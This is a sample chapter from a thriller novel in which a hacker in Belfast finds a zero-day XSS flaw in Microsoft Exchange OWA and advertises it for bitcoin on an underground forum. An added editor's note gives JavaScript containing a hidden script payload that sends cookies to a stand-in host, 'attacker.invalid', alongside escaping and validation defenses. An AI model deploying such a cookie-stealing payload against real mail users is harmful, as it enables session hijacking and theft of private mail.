
Turlach Flanagan: Zero Day

Enjoy this sample Virus Bomb chapter about how Turlach Flanagan finds a zero day exploit and then markets and sells it. A zero day is the name given to a newly discovered software vulnerability that the vendor does not yet know about: no patch exists, defenders have had zero days to prepare, and an exploit for it works against fully patched systems. Zero days command a premium price in a thriving criminal underground marketplace because attackers are often willing to outbid the bug bounties software companies pay researchers who report flaws responsibly. The mastermind behind the Elaine Devereux persona is one such attacker.

Zero Day

The candlelight gave Turlach Flanagan’s room above a pub in Belfast, Northern Ireland, a rustic feel, even though it was crammed with computer equipment. “You’re knackered,” he shouted and pounded his desk. He leaned back in his chair and rubbed his eyes. But what else besides Irish whiskey could numb the pain after losing his family during the troubles after the Irish Troubles?

He rose from his desk and staggered to his bathroom. The image in the mirror, with deep bags under his bloodshot eyes and greasy, grey hair, mostly pulled back and tied off into a ponytail with a rubber band, looked more like a homeless refugee than a former college professor.

How does your mind still function?

But maybe his mind wasn’t functioning so well after all.

He lurched back to his desk and stared at his work in progress. The laptop screen, Microsoft Exchange reference books, hand-drawn flow diagrams, code listings, and empty shot glasses all mocked him. He swept his arm across the desk, sending it all crashing to the floor. A lit candle also went flying, landing on the floor in the middle of all that paper. It smoldered and then ignited.

“You nappy arwshe, maybe it’s time to get it over with.”

Like a scientist monitoring an experiment, he watched the flames consume a few papers and then a notebook and now some newspapers. The carpet smoldered and plastic jewel cases around a few CDs started to melt, filling the room with acrid smoke. Would one hundred proof Irish whiskey put it out or make it worse?

He grabbed his last remaining unopened bottle, twisted off the cap, downed a swig, and then poured it over the growing flames. “Ow!” The flames jumped and singed his hand.

“You’re a flaming eejit, but it’s not time to die in a ball o’ fire yet!”

He ran back to his bathroom and filled a bucket with water. He ran back and poured it on the flames.

The flames hissed and smoked and then subsided as the water spread across the black spot on the carpeted floor, leaving a pile of wet paper and ashes and a smoky distillery aroma in the air.

He tipped the bottle back to finish it off and then dropped it in the middle of the wet mess and teetered to his bed.

“You’re a manky neddy!” he mumbled as he drifted into a fitful sleep.

Five hours later, the room still smelled like smoke, which didn’t help his growing headache. He swung his feet to the floor, rubbed his eyes, stood, and opened a window. A few birds chirped outside, announcing predawn of another miserable day on this miserable little planet. He staggered to his now-empty work desk and surveyed the damage from last night. “Serves ya right, ya mongo sap.”

He picked up his laptop from the edge of the booze-soaked pile of papers on the floor and dried the bottom with his body-odor-stained shirt. He pressed the power button and waited. After a few seconds, it showed the familiar, “Press CTRL + ALT + DELETE to logon.”

“A rake of good luck,” he mumbled. “Now, stop arsing around, and let’s find what we’re looking for.”

A few hours later, Turlach leaned back in his chair, ran a hand through his greasy hair, wiped it on his shirt, and smiled. The “Hello World” window on his laptop screen wasn’t important. What was important was the method he came up with to generate that little picture. The sunlight made his head hurt. And he needed to use the bathroom. He didn’t care. Not yet.

Document what we have first. He launched Notepad and composed a first draft of an ad he would post on an underground internet forum. The ad read:

A new zero-day XSS exploit with Microsoft Exchange. Launch OWA, log on, and compose a new message. Put a specially crafted string in the ‘bcc’ field to run a local script of your choice. Requires phishing to intercept the initial logon to deploy your payload script. $30K in bitcoin, including consulting to implement. I will provide a sample script to grab the user’s cookie and upload to Dropbox. You can modify as appropriate. Serious buyers only.

Turlach stared at the ad text for a few minutes before clicking the “Submit” button to post it. He smiled. Which made the hammer inside his head pound even harder. But no matter. If successful, this exploit would pay for all new computer equipment and more.

Now he could pee. He returned a few minutes later with a glass of orange juice. Responses were already coming in.

One response, from somebody named John, was typical: “Give me more information. How would this work?”

Turlach shook his head. “Idiots!” But if he wanted the money for the exploit he discovered, it was obvious he’d have to spell it out to these neddies. Thirty minutes later, his next post summed it up:

For all you newbies, a zero-day exploit is one that hasn’t been discovered yet by the software vendor. OWA, or Outlook Web App, is the Microsoft webmail function that comes with Microsoft Exchange Server. The exploit I discovered allows you to use OWA to run an arbitrary script on your computer if you place a specially formatted string in the bcc field. This script could upload a cookie with authentication information, or it could access your email and calendars, or it could upload documents from your profile. Or it could do anything else you want, limited only by your primitive imaginations. I provided a sample script to upload a cookie. You can use my sample to build something more elaborate if you want. Or pay me to do it. The object, of course, is not to run the script on your computer. The object is to entice somebody else to run it on his computer and send every important piece of information about his pitiful life to you. To take advantage of my exploit, you need to convince your targeted user to run the program I wrote to deploy your script. That’s why it requires phishing. And I’ll also answer your next obvious question. No, your targeted users will not see the string my program injects into the bcc field because the string contains nonprintable characters.
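Editor's note, not part of the chapter: Turlach's ad describes a cross-site scripting bug in a web mail form, where a string that the victim never consciously sees is rendered by the browser as script. The example below is added here to show the generic mechanism behind that class of bug and the two checks a defender wants. It is not the fictional OWA exploit and does not reproduce any real Exchange flaw; the field name, the payload, the attacker URL (`attacker.invalid`, a reserved non-routable domain) and the render functions are all constructed for illustration.

```javascript
// Added example: how a script payload in an address field (here a
// constructed "bcc" value) survives unescaped rendering, and how
// output escaping plus input validation stop it. Constructed for
// illustration; not the novel's OWA bug or any real Exchange defect.

// Constructed sample input: a <script> element padded with characters
// that have no visible glyph (zero-width space U+200B and the C0
// control U+0001). A casual look at the field shows nothing useful.
const HIDDEN_PAYLOAD =
  "\u200B\u0001<script>fetch('https://attacker.invalid/?c='" +
  "+document.cookie)</script>\u0001\u200B";

// Vulnerable rendering: the field value is concatenated straight into
// HTML, so a browser that parses this markup executes the script.
function renderRecipientUnsafe(value) {
  return `<span class="recipient">${value}</span>`;
}

// Output escaping: encode the characters that carry meaning in HTML
// element content so the payload is displayed as text, not parsed.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderRecipientEscaped(value) {
  return `<span class="recipient">${escapeHtml(value)}</span>`;
}

// Input validation, check 1: an address field has no business holding
// C0/C1 control characters or zero-width / bidi-format characters.
function hasNonPrintable(value) {
  return /[\u0000-\u0008\u000B\u000C\u000E-\u001F\u007F-\u009F\u200B-\u200F\u202A-\u202E\u2060\uFEFF]/u
    .test(value);
}

// Input validation, check 2 (allowlist): split the field on the usual
// separators and keep only tokens that look like an email address.
// Anything else, including the hidden payload, is rejected rather than
// rendered. The address pattern is deliberately conservative.
const ADDRESS_RE = /^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/;

function parseRecipients(field) {
  const valid = [];
  const rejected = [];
  for (const raw of field.split(/[;,]/)) {
    const token = raw.trim();
    if (token === "") continue;
    if (!hasNonPrintable(token) && ADDRESS_RE.test(token)) {
      valid.push(token);
    } else {
      rejected.push(token);
    }
  }
  return { valid, rejected };
}

// Helper for comparing the two renderers: is there still a live
// <script> start tag in the produced HTML?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

Escaping at output is what turns the payload back into harmless text; validating at input is what keeps it out of the mailbox in the first place. A production mail client does both, and the validator should run server-side, since anything done only in the browser is under the attacker's control.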

#####

In Tehran, 6,200 kilometers away, the mastermind behind the Elaine Devereux persona spotted the ad while scouring the usual forums. He stroked his chin. Yes, this could be useful.

Note to readers

Turlach Flanagan, AKA Livefree, is one player in a global criminal supply chain of venture capitalists, integrators, and specialists, all connected over the internet. If you want to attack a country or plunder a business, Turlach, or somebody like him, has the tools you need, if you know where to look. Just make sure you offer the right price. Be prepared to haggle.

Curious about what 100 proof Irish Whiskey will do to a fire? Enjoy this video I made with my grandsons in early 2018.